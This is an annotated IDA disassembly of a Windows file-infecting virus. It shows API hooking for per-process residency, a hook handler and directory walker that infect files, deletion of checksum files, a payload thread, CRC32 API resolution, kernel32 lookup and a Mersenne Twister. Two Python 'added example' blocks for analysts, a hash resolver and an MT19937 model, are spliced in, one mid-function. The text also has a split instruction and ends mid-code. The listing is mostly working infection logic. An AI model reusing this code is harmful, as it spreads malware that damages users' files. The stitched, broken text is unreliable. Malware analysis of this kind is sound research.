CODE:004016AB pop esi
CODE:004016AC xor ecx, ecx
CODE:004016AE mov edx, [esi+10h]
CODE:004016B1 add edx, ebx
CODE:004016B3 mov esi, [esi]
CODE:004016B5 add esi, ebx
CODE:004016B7 @@NextAPIHook:
CODE:004016B7 lodsd
CODE:004016B8 test eax, eax
CODE:004016BA jz short @@NoMoreHooks
CODE:004016BC push esi
CODE:004016BD lea esi, [eax+ebx+2]
CODE:004016C1 lea edi, API_Hook_Table
CODE:004016C7 cmp al, 80h
CODE:004016C9 jz short @@NotInThisStructure
CODE:004016CB @@SearchAPIHOOKStructure:
CODE:004016CB cmp byte ptr [edi], 0
CODE:004016CE jz short @@NotInThisStructure
CODE:004016D0 push esi
CODE:004016D1 push ebx
CODE:004016D2 call GetCRC32OfString
CODE:004016D7 cmp [edi], ebx
CODE:004016D9 pop ebx
CODE:004016DA jz short @@SetHook
CODE:004016DC @@DoneSetHook:
CODE:004016DC pop esi
CODE:004016DD add edi, 0Ch
CODE:004016E0 jmp short @@SearchAPIHOOKStructure
CODE:004016E2 ; ---------------------------------------------------------------------------
CODE:004016E2 @@SetHook:
CODE:004016E2 lea esi, [edx+ecx*4]
CODE:004016E5 mov eax, [esi]
CODE:004016E7 mov [edi+8], eax
CODE:004016EA lea eax, EntryPoint
CODE:004016F0 add eax, [edi+4]
CODE:004016F3 mov [esi], eax
CODE:004016F5 jmp short @@DoneSetHook

CODE:004016F7 ; ---------------------------------------------------------------------------
CODE:004016F7 @@NotInThisStructure:
CODE:004016F7 pop esi
CODE:004016F8 inc ecx
CODE:004016F9 jmp short @@NextAPIHook
CODE:004016FB ; ---------------------------------------------------------------------------
CODE:004016FB @@NoMoreHooks:
CODE:004016FB popa
CODE:004016FC retn 4
CODE:004016FC HookAPIs endp

The previous code block hooks several APIs, a technique also known as per-process residency.

CODE:004016FF call GenericHookHandler
CODE:00401704 jmp AH_CreateFileA
CODE:0040170A call GenericHookHandler
CODE:0040170F jmp AH_WinExec
CODE:00401715 call GenericHookHandler
CODE:0040171A jmp AH_OpenFile
CODE:00401720 call GenericHookHandler
CODE:00401725 jmp AH__lopen
CODE:0040172B call GenericHookHandler
CODE:00401730 jmp AH_CreateProcessA
CODE:00401736 call GenericHookHandler
CODE:0040173B jmp AH_CopyFileA
CODE:00401741 call GenericHookHandler
CODE:00401746 jmp AH_MoveFileA

CODE:0040174C call GenericHookHandler
CODE:00401751 jmp AH_MoveFileExA
CODE:00401757 call GenericHookHandler
CODE:0040175C jmp AH_FindFirstFileA
CODE:00401762 call GenericHookHandler
CODE:00401767 jmp AH_GetFullPathNameA
CODE:0040176D call GenericHookHandler
CODE:00401772 jmp AH_GetShortPathNameA
CODE:00401778 call GenericHookHandler
CODE:0040177D jmp AH_SetFileAttributesA
CODE:00401783 call GenericHookHandler
CODE:00401788 jmp AH_GetFileAttributesA
CODE:0040178E call GenericHookHandler
CODE:00401793 jmp AH_GetBinaryTypeA
CODE:00401799 pushf
CODE:0040179A pusha
CODE:0040179B call Initialize
CODE:004017A0 test eax, eax
CODE:004017A2 jz short loc_4017cf
CODE:004017A4 or ThreadExecution, 0FFFFFFFFh
CODE:004017AB push 0FFFFh
CODE:004017B0 push ThreadHandle
CODE:004017B6 mov al, 1Bh
CODE:004017B8 call StealthAPI
CODE:004017BD push ThreadHandle
CODE:004017C3 mov al, 5
CODE:004017C5 call StealthAPI
CODE:004017CA call UnInitialize

CODE:004017CF loc_4017cf:
CODE:004017CF add esp, 1000h
CODE:004017D5 popa
CODE:004017D6 popf
CODE:004017D7 jmp AH_ExitProcess
CODE:004017DD pushf
CODE:004017DE pusha
CODE:004017DF call Initialize
CODE:004017E4 test eax, eax
CODE:004017E6 jz short loc_40184a
CODE:004017E8 mov eax, 3
CODE:004017ED call RandomNumber
CODE:004017F2 test eax, eax
CODE:004017F4 jnz short loc_40184a
CODE:004017F6 push 0
CODE:004017F8 lea eax, PayloadThread
CODE:004017FE push esp
CODE:004017FF push 0
CODE:00401801 push 0
CODE:00401803 push eax
CODE:00401804 push 0
CODE:00401806 push 0
CODE:00401808 mov al, 1Ah
CODE:0040180A call StealthAPI
CODE:0040180F pop ebx
CODE:00401810 test eax, eax
CODE:00401812 jz short loc_40184a
CODE:00401814 push eax
CODE:00401815 mov al, 5
CODE:00401817 call StealthAPI
CODE:0040181C push 0
CODE:0040181E lea eax, szpayloadmessage
CODE:00401824 push eax
CODE:00401825 lea eax, szpayloadtitle
CODE:0040182B push eax
CODE:0040182C push dword ptr [esp+1034h]
CODE:00401833 mov al, 29h
CODE:00401835 call StealthAPI
CODE:0040183A call UnInitialize
CODE:0040183F add esp, 1000h
CODE:00401845 popa
CODE:00401846 popf
CODE:00401847 retn 10h

CODE:0040184A loc_40184a:
CODE:0040184A call UnInitialize
CODE:0040184F add esp, 1000h
CODE:00401855 popa
CODE:00401856 popf
CODE:00401857 jmp AH_ShellAboutA

The previous code block is a series of handlers for the hooked API functions.

CODE:0040185D GenericHookHandler proc near
CODE:0040185D arg_ff8 = dword ptr 0FFCh
CODE:0040185D arg_1004 = dword ptr 1008h
CODE:0040185D pushf
CODE:0040185E pusha
CODE:0040185F @@GenericHookIsBusy:
CODE:0040185F cmp GenericHookState, 0
CODE:00401866 jnz short @@GenericHookIsBusy
CODE:00401868 or GenericHookState, 0FFFFFFFFh
CODE:0040186F call Initialize
CODE:00401874 test eax, eax
CODE:00401876 jz short @@Return
CODE:00401878 cmp Infect_Encrypted, 0
CODE:0040187F jz short @@Return
CODE:00401881 mov esi, [esp+24h+arg_1004]
CODE:00401888 lea edi, [ebp+13ch]
CODE:0040188E push edi
CODE:0040188F push esi
CODE:00401890 mov al, 16h
CODE:00401892 call StealthAPI
CODE:00401897 inc eax
CODE:00401898 jz short @@Return
CODE:0040189A dec eax
CODE:0040189B push eax
CODE:0040189C mov al, 5
CODE:0040189E call StealthAPI
CODE:004018A3 lea edi, [ebp+168h]
CODE:004018A9 mov esi, [esp+30h+arg_ff8]
CODE:004018B0 @@CopyFileName:
CODE:004018B0 lodsb

CODE:004018B1 stosb
CODE:004018B2 test al, al
CODE:004018B4 jnz short @@CopyFileName
CODE:004018B6 call InfectFile
CODE:004018BB @@Return:
CODE:004018BB add esp, 1000h
CODE:004018C1 and GenericHookState, 0
CODE:004018C8 popa
CODE:004018C9 popf
CODE:004018CA retn
CODE:004018CA GenericHookHandler endp

The previous code block is the generic hook handler routine shared by the hooked APIs.

CODE:004018CB Uppercase proc near
CODE:004018CB pusha
CODE:004018CC mov edi, esi
CODE:004018CE @@MakeUppercaseLoop:
CODE:004018CE lodsb
CODE:004018CF cmp al, 'a'
CODE:004018D1 jb short @@NoUppercase
CODE:004018D3 cmp al, 'z'
CODE:004018D5 ja short @@NoUppercase
CODE:004018D7 and al, 11011111b
CODE:004018D9 @@NoUppercase:
CODE:004018D9 stosb
CODE:004018DA test al, al
CODE:004018DC jnz short @@MakeUppercaseLoop
CODE:004018DE popa
CODE:004018DF retn
CODE:004018DF Uppercase endp

The previous code block converts a string to all uppercase in place.

CODE:004018E0 RandomNumber proc near
CODE:004018E0 var_4 = dword ptr -4

CODE:004018E0 pusha
CODE:004018E1 push eax
CODE:004018E2 @@RandomNumberIsBusy:
CODE:004018E2 cmp RandomNumberState, 0
CODE:004018E9 jnz short @@RandomNumberIsBusy
CODE:004018EB or RandomNumberState, 0FFFFFFFFh
CODE:004018F2 call genrand_int32
CODE:004018F7 pop ecx
CODE:004018F8 xor edx, edx
CODE:004018FA div ecx
CODE:004018FC mov [esp+20h+var_4], edx
CODE:00401900 and RandomNumberState, 0
CODE:00401907 popa
CODE:00401908 retn
CODE:00401908 RandomNumber endp

The previous code block returns a random number within a range (the upper bound is passed in EAX).

CODE:00401909 GetAPIsFromCRC32List proc near
CODE:00401909 var_28 = dword ptr -28h
CODE:00401909 var_24 = dword ptr -24h
CODE:00401909 PA_EAX = dword ptr -4
CODE:00401909 ARG1 = dword ptr 4
CODE:00401909 ARG2 = dword ptr 8
CODE:00401909 ARG3 = dword ptr 0Ch
CODE:00401909 ARG4 = dword ptr 10h
CODE:00401909 pusha
CODE:0040190A or dword ptr [ebp+14h], 0FFFFFFFFh
CODE:0040190E mov ebx, [esp+20h+arg4]
CODE:00401912 mov esi, [ebx+3ch]
CODE:00401915 add esi, ebx
CODE:00401917 mov esi, [esi+78h]
CODE:0040191A lea esi, [ebx+esi+18h]
CODE:0040191E lodsd
CODE:0040191F xchg eax, ecx
CODE:00401920 inc ecx
CODE:00401921 lodsd
CODE:00401922 add eax, ebx
CODE:00401924 push eax
CODE:00401925 lodsd
CODE:00401926 lea edi, [ebx+eax]
CODE:00401929 mov edi, [edi]
CODE:0040192B add edi, ebx
CODE:0040192D lodsd
CODE:0040192E add eax, ebx
CODE:00401930 push eax

CODE:00401931 @@ProcessNextAPIName:
CODE:00401931 dec ecx
CODE:00401932 jecxz short @@VerifyAPITable
CODE:00401934 xchg esi, edi
CODE:00401936 inc dword ptr [ebp+14h]
CODE:00401939 call GetCRC32OfString
CODE:0040193E mov edi, esi
CODE:00401940 mov esi, [esp+28h+arg1]
CODE:00401944 or edx, 0FFFFFFFFh
CODE:00401947 @@CompareNextCRC32InTable:
CODE:00401947 inc edx
CODE:00401948 lodsd
CODE:00401949 test eax, eax
CODE:0040194B jz short @@ProcessNextAPIName
CODE:0040194D cmp eax, ebx
CODE:0040194F jnz short @@CompareNextCRC32InTable
CODE:00401951 mov esi, [esp+28h+var_28]
CODE:00401954 mov ebx, [ebp+14h]
CODE:00401957 movzx ebx, word ptr [esi+ebx*2]
CODE:0040195B mov esi, [esp+28h+var_24]
CODE:0040195F mov ebx, [esi+ebx*4]
CODE:00401962 add ebx, [esp+28h+arg4]
CODE:00401966 mov eax, [esp+28h+arg2]
CODE:0040196A lea eax, [eax+edx*4]
CODE:0040196D mov [eax], ebx
CODE:0040196F jmp short @@ProcessNextAPIName
CODE:00401971 @@VerifyAPITable:
CODE:00401971 mov esi, [esp+28h+arg2]
CODE:00401975 mov ecx, [esp+28h+arg3]
CODE:00401979 @@VerifyAPIEntry:
CODE:00401979 lodsd
CODE:0040197A test eax, eax
CODE:0040197C jz short @@UnresolvedAPIEntry
CODE:0040197E loop @@VerifyAPIEntry
CODE:00401980 @@UnresolvedAPIEntry:
CODE:00401980 add esp, 8
CODE:00401983 mov [esp+20h+pa_eax], eax
CODE:00401987 popa
CODE:00401988 retn 10h
CODE:00401988 GetAPIsFromCRC32List endp

The previous code block retrieves pointers to several APIs. The function requires a pointer to the CRC32 list, a pointer to the buffer where the API addresses will be saved, the number of imported APIs and the base address.

CODE:0040198B GetCRC32OfString proc near
CODE:0040198B push eax
CODE:0040198C push ecx
CODE:0040198D push edx
CODE:0040198E push edi
CODE:0040198F cld
CODE:00401990 xor ecx, ecx
CODE:00401992 dec ecx
CODE:00401993 mov edx, ecx
CODE:00401995 @@NextByteCRC:
CODE:00401995 cmp byte ptr [esi], 0
CODE:00401998 jz short @@Done
CODE:0040199A xor eax, eax
CODE:0040199C xor ebx, ebx
CODE:0040199E lodsb
CODE:0040199F xor al, cl
CODE:004019A1 mov cl, ch
CODE:004019A3 mov ch, dl
CODE:004019A5 mov dl, dh
CODE:004019A7 mov dh, 8
CODE:004019A9 @@NextBitCRC:
CODE:004019A9 shr bx, 1
CODE:004019AC rcr ax, 1
CODE:004019AF jnb short @@NoCRC
CODE:004019B1 xor ax, 8320h
CODE:004019B5 xor bx, 0EDB8h
CODE:004019BA @@NoCRC:
CODE:004019BA dec dh
CODE:004019BC jnz short @@NextBitCRC
CODE:004019BE xor ecx, eax
CODE:004019C0 xor edx, ebx
CODE:004019C2 dec edi
CODE:004019C3 jnz short @@NextByteCRC
CODE:004019C5 @@Done:
CODE:004019C5 not edx
CODE:004019C7 not ecx
CODE:004019C9 mov eax, edx

CODE:004019CB rol eax, 10h
CODE:004019CE mov ax, cx
CODE:004019D1 inc esi
CODE:004019D2 xchg eax, ebx
CODE:004019D3 pop edi
CODE:004019D4 pop edx
CODE:004019D5 pop ecx
CODE:004019D6 pop eax
CODE:004019D7 retn
CODE:004019D7 GetCRC32OfString endp

The previous code block calculates the CRC32 of a zero-terminated string. The function expects a pointer to the ASCII string in the ESI register and returns the checksum in EBX.

CODE:004019D8 GetKernel32Base proc near
CODE:004019D8 push eax
CODE:004019D9 push esi
CODE:004019DA xor esi, esi
CODE:004019DC mov esi, fs:[esi]
CODE:004019DF @@GetNextSEHandler:
CODE:004019DF mov eax, [esi]
CODE:004019E1 inc eax
CODE:004019E2 jz short @@NoMoreSEHandlersLeft
CODE:004019E4 dec eax
CODE:004019E5 xchg eax, esi
CODE:004019E6 jmp short @@GetNextSEHandler
CODE:004019E8 @@NoMoreSEHandlersLeft:
CODE:004019E8 mov eax, [esi+4]
CODE:004019EB xor ax, ax
CODE:004019EE @@GetMZHeader:
CODE:004019EE cmp word ptr [eax], 5A4Dh
CODE:004019F3 jz short @@IsMZHeader
CODE:004019F5 @@Sub10hPages:
CODE:004019F5 sub eax, 10000h
CODE:004019FA jmp short @@GetMZHeader
CODE:004019FC @@IsMZHeader:
CODE:004019FC mov [ebp+0], eax
CODE:004019FF mov esi, [eax+3ch]
CODE:00401A02 add esi, eax
CODE:00401A04 cmp dword ptr [esi], 4550h
CODE:00401A0A jnz short @@Sub10hPages
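The following is an added example, not code from the paper or from the virus: a Python model of GetCRC32OfString used the way an analyst would use it, to turn the CRC32 values found in a sample's DLL and API tables (the ones consumed by HookAPIs and GetAPIsFromCRC32List) back into names. The routine's constants (initial value 0FFFFFFFFh, the 0EDB8h:8320h word pair, i.e. polynomial 0EDB88320h, and the final NOT) identify ordinary reflected CRC-32, which the block cross-checks against zlib.crc32. The candidate name list and the dumped hash values in the demo are constructed for illustration.

```python
# Added example (not the paper's or the virus's code): CRC32 hash resolver
# modelled on GetCRC32OfString, Uppercase and the hash tables they feed.
import zlib
from typing import Dict, Iterable, Optional

CRC32_POLY = 0xEDB88320   # the 0EDB8h (high word) : 8320h (low word) XOR pair


def crc32_bitwise(data: bytes) -> int:
    """Bit-serial CRC-32 exactly as GetCRC32OfString computes it (CRC in DX:CX)."""
    crc = 0xFFFFFFFF                           # xor ecx, ecx / dec ecx / mov edx, ecx
    for byte in data:
        temp = (crc ^ byte) & 0xFF             # xor al, cl
        for _ in range(8):                     # @@NextBitCRC, DH counts 8 rounds
            if temp & 1:                       # bit shifted out by shr bx / rcr ax
                temp = (temp >> 1) ^ CRC32_POLY
            else:
                temp >>= 1
        crc = (crc >> 8) ^ temp                # mov cl, ch ... / xor ecx, eax / xor edx, ebx
    return (~crc) & 0xFFFFFFFF                 # not edx / not ecx


def uppercase_ascii(name: str) -> str:
    """The Uppercase routine: AND 0DFh applied to bytes in 'a'..'z' only."""
    return "".join(chr(ord(c) & 0xDF) if "a" <= c <= "z" else c for c in name)


def crc32_of_name(name: str, uppercase: bool) -> int:
    """Hash a name the way the virus does. HookAPIs and DirectoryTraversal run
    the string through Uppercase first; GetAPIsFromCRC32List hashes export
    names from the export table as they are, case preserved."""
    if uppercase:
        name = uppercase_ascii(name)
    return crc32_bitwise(name.encode("ascii"))


def build_hash_table(names: Iterable[str], uppercase: bool) -> Dict[int, str]:
    """Precompute CRC32 -> name for a list of candidate names."""
    return {crc32_of_name(n, uppercase): n for n in names}


def resolve_hashes(hashes: Iterable[int], table: Dict[int, str]) -> Dict[int, Optional[str]]:
    """Map hashes dumped from a sample to names; unknown hashes map to None."""
    return {h: table.get(h) for h in hashes}


def matches_reference(data: bytes) -> bool:
    """Sanity check of the bit-serial routine against the standard CRC-32."""
    return crc32_bitwise(data) == (zlib.crc32(data) & 0xFFFFFFFF)


if __name__ == "__main__":
    # Candidate names: the APIs whose hook stubs appear in the listing.
    candidates = ["CreateFileA", "WinExec", "OpenFile", "_lopen", "CreateProcessA",
                  "CopyFileA", "MoveFileA", "MoveFileExA", "FindFirstFileA",
                  "GetFullPathNameA", "GetShortPathNameA", "SetFileAttributesA",
                  "GetFileAttributesA", "GetBinaryTypeA", "ExitProcess", "ShellAboutA"]
    api_table = build_hash_table(candidates, uppercase=False)
    # Constructed "dump": one real hash and one placeholder value that will not resolve.
    dumped = [crc32_of_name("WinExec", False), 0x12345678]
    for h, name in resolve_hashes(dumped, api_table).items():
        print(f"{h:08X} -> {name or '<unresolved>'}")
    print(f"KERNEL32.DLL -> {crc32_of_name('kernel32.dll', True):08X}")
```

Because DLL names are uppercased before hashing but export names are not, a resolver has to build two tables; feeding an API name through the uppercase path produces a value that never matches the sample's API table.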

CODE:00401A0C pop esi
CODE:00401A0D pop eax
CODE:00401A0E retn
CODE:00401A0E GetKernel32Base endp

The previous code block retrieves the Kernel32 base address in memory. The function locates Kernel32 by walking the SEH chain.

CODE:00401A0F DirectoryTraversal proc near
CODE:00401A0F var_17c = dword ptr -17Ch
CODE:00401A0F var_170 = dword ptr -170h
CODE:00401A0F var_144 = dword ptr -144h
CODE:00401A0F var_40 = dword ptr -40h
CODE:00401A0F pusha
CODE:00401A10 push 0
CODE:00401A12 lea eax, DIR_Root+2
CODE:00401A18 push eax
CODE:00401A19 mov al, 0Ch
CODE:00401A1B call StealthAPI
CODE:00401A20 test eax, eax
CODE:00401A22 jz @@CantSetDirectory
CODE:00401A28 @@NewDirectory:
CODE:00401A28 sub esp, 140h
CODE:00401A2E push esp
CODE:00401A2F lea eax, DIR_Wildcards
CODE:00401A35 push eax
CODE:00401A36 mov al, 16h
CODE:00401A38 call StealthAPI
CODE:00401A3D push eax
CODE:00401A3E inc eax
CODE:00401A3F jz @@GoToParentDirectory
CODE:00401A45 dec eax
CODE:00401A46 @@ExamineFile:
CODE:00401A46 lea ebx, [esp+174h+var_144]
CODE:00401A4A test byte ptr [esp+174h+var_170], 10h
CODE:00401A4F jz short @@PassFileForInfection
CODE:00401A51 cmp byte ptr [ebx], '.'
CODE:00401A54 jz short @@FindNextFile
CODE:00401A56 push ebx
CODE:00401A57 mov al, 0Ch
CODE:00401A59 call StealthAPI

CODE:00401A5E jmp short @@NewDirectory
CODE:00401A60 ; ---------------------------------------------------------------------------
CODE:00401A60 @@PassFileForInfection:
CODE:00401A60 lea esi, [esp+174h+var_170]
CODE:00401A64 lea edi, [ebp+13ch]
CODE:00401A6A mov ecx, 140h
CODE:00401A6F rep movsb
CODE:00401A71 push eax
CODE:00401A72 lea esi, [ebp+168h]
CODE:00401A78 call Uppercase
CODE:00401A7D call GetCRC32OfString
CODE:00401A82 lea esi, CRC32_Checksumfile_List
CODE:00401A88 @@CheckForChecksumList:
CODE:00401A88 lodsd
CODE:00401A89 xchg eax, ecx
CODE:00401A8A jecxz short @@NotAChecksumFile
CODE:00401A8C cmp ebx, ecx
CODE:00401A8E jnz short @@CheckForChecksumList
CODE:00401A90 lea esi, [ebp+168h]
CODE:00401A96 push esi
CODE:00401A97 push 80h
CODE:00401A9C push esi
CODE:00401A9D mov al, 11h
CODE:00401A9F call StealthAPI
CODE:00401AA4 mov al, 15h
CODE:00401AA6 call StealthAPI
CODE:00401AAB pop eax
CODE:00401AAC jmp short @@FindNextFile
CODE:00401AAE @@NotAChecksumFile:
CODE:00401AAE pop eax
CODE:00401AAF or dword ptr [ebp+280h], 0FFFFFFFFh
CODE:00401AB6 call InfectFile
CODE:00401ABB inc dword ptr [ebp+280h]
CODE:00401AC1 jz short @@FindNextFile
CODE:00401AC3 dec dword ptr [ebp+27ch]
CODE:00401AC9 jz short @@CloseHandles
CODE:00401ACB @@FindNextFile:
CODE:00401ACB lea ebx, [esp+174h+var_170]

CODE:00401ACF push ebx
CODE:00401AD0 push eax
CODE:00401AD1 mov al, 17h
CODE:00401AD3 call StealthAPI
CODE:00401AD8 cmp ThreadExecution, 0FFFFFFFFh
CODE:00401ADF jz short @@CloseHandles
CODE:00401AE1 test eax, eax
CODE:00401AE3 mov eax, [esp+17ch+var_17c]
CODE:00401AE6 jnz @@ExamineFile
CODE:00401AEC @@GoToParentDirectory:
CODE:00401AEC push eax
CODE:00401AED mov al, 18h
CODE:00401AEF call StealthAPI
CODE:00401AF4 lea eax, DIR_Parent
CODE:00401AFA push eax
CODE:00401AFB mov al, 0Ch
CODE:00401AFD call StealthAPI
CODE:00401B02 add esp, 144h
CODE:00401B08 mov eax, [esp+40h+var_40]
CODE:00401B0B test eax, eax
CODE:00401B0D jnz short @@FindNextFile
CODE:00401B0F @@CantSetDirectory:
CODE:00401B0F add esp, 4
CODE:00401B12 popa
CODE:00401B13 retn
CODE:00401B14 @@CloseHandles:
CODE:00401B14 mov esi, esp
CODE:00401B16 lodsd
CODE:00401B17 test eax, eax
CODE:00401B19 jz short @@CantSetDirectory
CODE:00401B1B mov al, 18h
CODE:00401B1D call StealthAPI
CODE:00401B22 add esp, 140h
CODE:00401B28 jmp short @@CloseHandles
CODE:00401B28 DirectoryTraversal endp

The previous code block traverses the directories looking for files to infect.

CODE:00401B2A init_genrand proc near

CODE:00401B2A ARG1 = dword ptr 4
CODE:00401B2A pusha
CODE:00401B2B lea edi, [ebp+304h]
CODE:00401B31 xor ecx, ecx
CODE:00401B33 mov eax, [esp+20h+arg1]
CODE:00401B37 stosd
CODE:00401B38 @@init_genrand_loop:
CODE:00401B38 inc ecx
CODE:00401B39 cmp ecx, 270h
CODE:00401B3F jz short @@Return
CODE:00401B41 mov edx, eax
CODE:00401B43 shr edx, 1Eh
CODE:00401B46 xor eax, edx
CODE:00401B48 imul eax, 6C078965h
CODE:00401B4E add eax, ecx
CODE:00401B50 stosd
CODE:00401B51 jmp short @@init_genrand_loop
CODE:00401B53 @@Return:
CODE:00401B53 mov [ebp+300h], ecx
CODE:00401B59 popa
CODE:00401B5A retn 4
CODE:00401B5A init_genrand endp

The previous code block initializes the generator's state array from a 32-bit seed.

CODE:00401B5D init_by_array proc near
CODE:00401B5D var_24 = dword ptr -24h
CODE:00401B5D arg_0 = dword ptr 4
CODE:00401B5D arg_4 = dword ptr 8
CODE:00401B5D pusha
CODE:00401B5E lea edi, [ebp+304h]
CODE:00401B64 mov esi, [esp+20h+arg_0]
CODE:00401B68 xor edx, edx
CODE:00401B6A push edx
CODE:00401B6B inc edx
CODE:00401B6C mov eax, [esp+24h+arg_4]
CODE:00401B70 mov ecx, 270h
CODE:00401B75 cmp eax, ecx
CODE:00401B77 jl short @@_jump1
CODE:00401B79 mov ecx, eax
CODE:00401B7B @@_jump1:

CODE:00401B7B push 12BD6AAh
CODE:00401B80 call init_genrand
CODE:00401B85 @@_loop1:
CODE:00401B85 mov eax, [edi+edx*4-4]
CODE:00401B89 mov ebx, eax
CODE:00401B8B shr eax, 1Eh
CODE:00401B8E xor eax, ebx
CODE:00401B90 imul eax, 19660Dh
CODE:00401B96 xor eax, [edi+edx*4]
CODE:00401B99 mov ebx, [esp+24h+var_24]
CODE:00401B9C add eax, ebx
CODE:00401B9E add eax, [esi+ebx*4]
CODE:00401BA1 mov [edi+edx*4], eax
CODE:00401BA4 inc edx
CODE:00401BA5 inc [esp+24h+var_24]
CODE:00401BA8 cmp edx, 270h
CODE:00401BAE jl short @@_jump2
CODE:00401BB0 mov eax, [edi+edx*4-4]
CODE:00401BB4 mov [edi], eax
CODE:00401BB6 xor edx, edx
CODE:00401BB8 inc edx
CODE:00401BB9 @@_jump2:
CODE:00401BB9 mov ebx, [esp+24h+var_24]
CODE:00401BBC cmp ebx, [esp+24h+arg_4]
CODE:00401BC0 jl short @@_jump3
CODE:00401BC2 and [esp+24h+var_24], 0
CODE:00401BC6 @@_jump3:
CODE:00401BC6 loop @@_loop1
CODE:00401BC8 mov ecx, 26Fh
CODE:00401BCD @@_loop2:
CODE:00401BCD mov eax, [edi+edx*4-4]
CODE:00401BD1 mov ebx, eax
CODE:00401BD3 shr eax, 1Eh
CODE:00401BD6 xor eax, ebx
CODE:00401BD8 imul eax, 5D588B65h
CODE:00401BDE xor eax, [edi+edx*4]
CODE:00401BE1 sub eax, edx
CODE:00401BE3 mov [edi+edx*4], eax
CODE:00401BE6 inc edx
CODE:00401BE7 mov eax, 270h
CODE:00401BEC cmp edx, eax
CODE:00401BEE jl short @@_jump4
CODE:00401BF0 mov eax, [edi+eax*4-4]
CODE:00401BF4 mov [edi], eax
CODE:00401BF6 xor edx, edx

CODE:00401BF8 inc edx
CODE:00401BF9 @@_jump4:
CODE:00401BF9 loop @@_loop2
CODE:00401BFB mov dword ptr [edi], 80000000h
CODE:00401C01 pop eax
CODE:00401C02 popa
CODE:00401C03 retn 8
CODE:00401C03 init_by_array endp

The previous code block initializes the generator's state array from an array of 32-bit seeds.

CODE:00401C06 genrand_int32 proc near
CODE:00401C06 lea edi, [ebp+304h]
CODE:00401C0C lea esi, mag01
CODE:00401C12 mov edx, [ebp+300h]
CODE:00401C18 cmp edx, 270h
CODE:00401C1E jl short @@_jump1
CODE:00401C20 xor ecx, ecx
CODE:00401C22 @@_loop2:
CODE:00401C22 cmp ecx, 0E3h
CODE:00401C28 jz short @@_jump3
CODE:00401C2A call proc00401cb4
CODE:00401C2F xor eax, [edi+ecx*4+634h]
CODE:00401C36 mov [edi+ecx*4], eax
CODE:00401C39 inc ecx
CODE:00401C3A jmp short @@_loop2
CODE:00401C3C @@_jump3:
CODE:00401C3C cmp ecx, 26Fh
CODE:00401C42 jz short @@_jump4
CODE:00401C44 call proc00401cb4
CODE:00401C49 xor eax, [edi+ecx*4-38ch]
CODE:00401C50 mov [edi+ecx*4], eax
CODE:00401C53 inc ecx
CODE:00401C54 jmp short @@_jump3
CODE:00401C56 @@_jump4:
CODE:00401C56 mov eax, [edi]

CODE:00401C58 and eax, 7FFFFFFFh
CODE:00401C5D mov ebx, [edi+9bch]
CODE:00401C63 call sub_401cc0
CODE:00401C68 x
or eax, [edi+630h]
CODE:00401C6E mov [edi+9bch], eax
CODE:00401C74 and dword ptr [ebp+300h], 0
CODE:00401C7B @@_jump1:
CODE:00401C7B mov ecx, [ebp+300h]
CODE:00401C81 mov ebx, [edi+ecx*4]
CODE:00401C84 inc dword ptr [ebp+300h]
CODE:00401C8A mov edx, ebx
CODE:00401C8C shr edx, 0Bh
CODE:00401C8F xor ebx, edx
CODE:00401C91 mov edx, ebx
CODE:00401C93 shl edx, 7
CODE:00401C96 and edx, 9D2C5680h
CODE:00401C9C xor ebx, edx
CODE:00401C9E mov edx, ebx
CODE:00401CA0 shl edx, 0Fh
CODE:00401CA3 and edx, 0EFC60000h
CODE:00401CA9 xor ebx, edx
CODE:00401CAB mov edx, ebx
CODE:00401CAD shr edx, 12h
CODE:00401CB0 xor ebx, edx
CODE:00401CB2 xchg eax, ebx
CODE:00401CB3 retn
CODE:00401CB3 genrand_int32 endp

The previous code block generates a random number in the interval [0, 0FFFFFFFFh].

CODE:00401D5B RDKE32Encrypt proc near
CODE:00401D5B arg_0 = dword ptr 4
CODE:00401D5B arg_4 = dword ptr 8
CODE:00401D5B arg_8 = dword ptr 0Ch
CODE:00401D5B arg_c = dword ptr 10h
CODE:00401D5B pusha
CODE:00401D5C mov edi, [esp+20h+arg_0]
CODE:00401D60 mov ebx, [esp+20h+arg_4]
CODE:00401D64 mov ecx, [esp+20h+arg_8]
CODE:00401D68 mov eax, [esp+20h+arg_c]
CODE:00401D6C push ebx
CODE:00401D6D push ecx
CODE:00401D6E push edi
CODE:00401D6F call SHA1
CODE:00401D74 call RandomNumber
CODE:00401D79 inc eax
CODE:00401D7A xchg eax, edx
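The following is an added example, not code from the paper or from the virus: a Python model of the init_genrand, init_by_array and genrand_int32 routines above together with the RandomNumber wrapper. The constants in the listing (state size 270h = 624, split point 0E3h = 227, multipliers 6C078965h, 19660Dh and 5D588B65h, tempering masks 9D2C5680h and 0EFC60000h, the 12BD6AAh = 19650218 seed and the final 80000000h) are those of the reference MT19937 Mersenne Twister, so the model can be checked against its published test vectors (3499211612 for init_genrand(5489), 1067595299 for init_by_array({0x123, 0x234, 0x345, 0x456})). The helper routines proc00401cb4 and sub_401cc0 are not shown on the page; the model assumes they perform the standard (y >> 1) ^ mag01[y & 1] step.

```python
# Added example (not the paper's or the virus's code): MT19937 model of the
# listing's init_genrand / init_by_array / genrand_int32 / RandomNumber.
from typing import Sequence

N = 624                 # 270h dwords of state at [ebp+304h]
M = 397                 # 634h / 4, the offset used in @@_loop2
MATRIX_A = 0x9908B0DF   # mag01[1]; mag01[0] is 0 (assumed, table not shown)
UPPER = 0x80000000
LOWER = 0x7FFFFFFF
MASK32 = 0xFFFFFFFF


class MT19937:
    def __init__(self) -> None:
        self.mt = [0] * N
        self.mti = N        # [ebp+300h]; N forces a twist on first use

    def init_genrand(self, seed: int) -> None:
        """init_genrand: mt[i] = 6C078965h * (mt[i-1] ^ (mt[i-1] >> 1Eh)) + i."""
        self.mt[0] = seed & MASK32
        for i in range(1, N):
            prev = self.mt[i - 1]
            self.mt[i] = (0x6C078965 * (prev ^ (prev >> 30)) + i) & MASK32
        self.mti = N

    def init_by_array(self, key: Sequence[int]) -> None:
        """init_by_array: seed with 12BD6AAh, then mix the key in (@@_loop1, @@_loop2)."""
        if not key:
            raise ValueError("key must contain at least one dword")
        self.init_genrand(0x12BD6AA)
        i, j = 1, 0
        for _ in range(max(N, len(key))):           # ecx = max(270h, key length)
            prev = self.mt[i - 1]
            self.mt[i] = ((self.mt[i] ^ ((prev ^ (prev >> 30)) * 0x19660D))
                          + key[j] + j) & MASK32
            i += 1
            j += 1
            if i >= N:                               # wrap: mt[0] = mt[N-1], edx = 1
                self.mt[0] = self.mt[N - 1]
                i = 1
            if j >= len(key):
                j = 0
        for _ in range(N - 1):                       # ecx = 26Fh
            prev = self.mt[i - 1]
            self.mt[i] = ((self.mt[i] ^ ((prev ^ (prev >> 30)) * 0x5D588B65))
                          - i) & MASK32
            i += 1
            if i >= N:
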